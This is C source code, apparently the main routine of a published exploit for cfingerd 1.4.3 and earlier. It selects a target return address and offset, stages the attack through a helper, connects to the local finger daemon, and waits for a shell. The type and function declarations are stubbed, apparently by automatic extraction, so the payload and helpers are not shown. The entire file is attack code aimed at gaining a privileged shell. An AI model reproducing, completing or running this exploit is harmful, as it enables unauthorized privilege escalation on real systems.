
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


typedef int uid_t ;
struct passwd {char* pw_name; } ;
struct TYPE_2__ {char* descr; int retaddr; } ;


 int EOF ;
 int FINGERD_PORT ;
 int LOCALHOST ;
 void* atoi (int ) ;
 int geteuid () ;
 int getopt (int,char**,char*) ;
 scalar_t__ getpwuid (int ) ;
 void* offset ;
 int optarg ;
 int play_the_game (int ,struct passwd*) ;
 int printf (char*,...) ;
 size_t sel ;
 int send (int,char*,int ,int ) ;
 int shellami (int) ;
 int sleep (int) ;
 int sockami (int ,int ) ;
 int sprintf (char*,char*,char*) ;
 int strlen (char*) ;
 TYPE_1__* target ;
 int usage (char*) ;

int
main(int argc, char **argv)
{
  int sock, cnt;
  uid_t euid;
  char sbuf[256];
  struct passwd *user;

  printf("\n  cfingerd 1.4.3 and prior exploit by qitest1\n\n");

  while((cnt = getopt(argc,argv,"t:o:h")) != EOF)
    {
   switch(cnt)
        {
   case 't':
     sel = atoi(optarg);
     break;
   case 'o':
     offset = atoi(optarg);
     break;
   case 'h':
     usage(argv[0]);
     break;
        }
    }

  euid = geteuid();
  user = (struct passwd *)getpwuid(euid);

  printf("+User: %s\n  against: %s\n", user->pw_name, target[sel].descr);
  target[sel].retaddr += offset;
  printf("+Using: retaddr = %p...\n  ok\n", target[sel].retaddr);

  play_the_game(target[sel].retaddr, user);

  sock = sockami(LOCALHOST, FINGERD_PORT);
  sprintf(sbuf, "%s\n", user->pw_name);
  send(sock, sbuf, strlen(sbuf), 0);

  printf("+Waiting for a shell...\n  0x69 =)\n");
  sleep(1);
  shellami(sock);
}
